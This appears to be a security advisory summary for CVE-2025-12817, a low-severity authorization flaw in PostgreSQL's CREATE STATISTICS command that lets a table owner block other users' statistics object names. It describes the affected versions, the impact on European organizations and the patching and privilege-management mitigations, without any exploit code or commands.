CVE-2025-12817 is a vulnerability in PostgreSQL's CREATE STATISTICS command caused by missing authorization checks. Specifically, a table owner can create statistics objects in any schema without proper authorization, which should normally be restricted. This flaw allows the table owner to create a statistics object with a given name that blocks other users who also have CREATE privileges from creating statistics objects with the same name later. The denial of service arises because PostgreSQL prevents duplicate statistics object names, so once the table owner creates one, subsequent CREATE STATISTICS commands for that name fail for other users. This affects PostgreSQL versions prior to 18.1, 17.7, 16.11, 15.15, 14.20, and 13.23. The vulnerability impacts availability of the CREATE STATISTICS functionality but does not compromise confidentiality or integrity of data. Exploitation requires the attacker to be a table owner, which is a relatively low privilege level but still requires some level of access. No user interaction is needed, and the attack can be performed remotely if the attacker has database access. There are no known exploits in the wild, and the CVSS score is 3.1, indicating low severity. The root cause is an authorization bypass in the statistics creation process, which PostgreSQL developers have addressed in the fixed versions. Organizations relying on PostgreSQL's query optimization and statistics features may experience degraded performance or monitoring issues if this vulnerability is exploited.

For European organizations, the primary impact of CVE-2025-12817 is a denial of service affecting the creation of statistics objects in PostgreSQL databases. This can disrupt database administrators' and developers' ability to maintain accurate statistics used for query planning and optimization, potentially leading to suboptimal query performance and degraded application responsiveness. While this does not directly expose sensitive data or allow data manipulation, the availability impact can affect business-critical applications relying on PostgreSQL for data processing. Organizations with multi-tenant or shared database environments are at higher risk, as a malicious or compromised table owner could intentionally block other users from creating necessary statistics. This could lead to operational disruptions, increased troubleshooting efforts, and potential downtime. Given PostgreSQL's widespread adoption in European public and private sectors, especially in finance, government, and technology industries, the vulnerability could have broad operational implications if left unpatched. However, the low severity and requirement for table owner privileges limit the scope of impact to environments where such privileges are granted to potentially untrusted users.

To mitigate CVE-2025-12817, European organizations should prioritize upgrading PostgreSQL to the fixed versions: 18.1, 17.7, 16.11, 15.15, 14.20, or 13.23. If immediate upgrading is not feasible, organizations should implement strict privilege management by limiting the assignment of table owner roles to trusted users only. Regular audits of database roles and permissions should be conducted to ensure no unnecessary table owner privileges are granted. Additionally, monitoring and alerting on CREATE STATISTICS commands can help detect anomalous or unauthorized usage patterns indicative of exploitation attempts. Database administrators should also consider segregating schemas and enforcing schema-level permissions to reduce the risk of cross-schema interference. Backup and recovery procedures should be reviewed to ensure rapid restoration of database functionality in case of denial of service. Finally, organizations should stay informed about PostgreSQL security advisories and apply patches promptly to reduce exposure.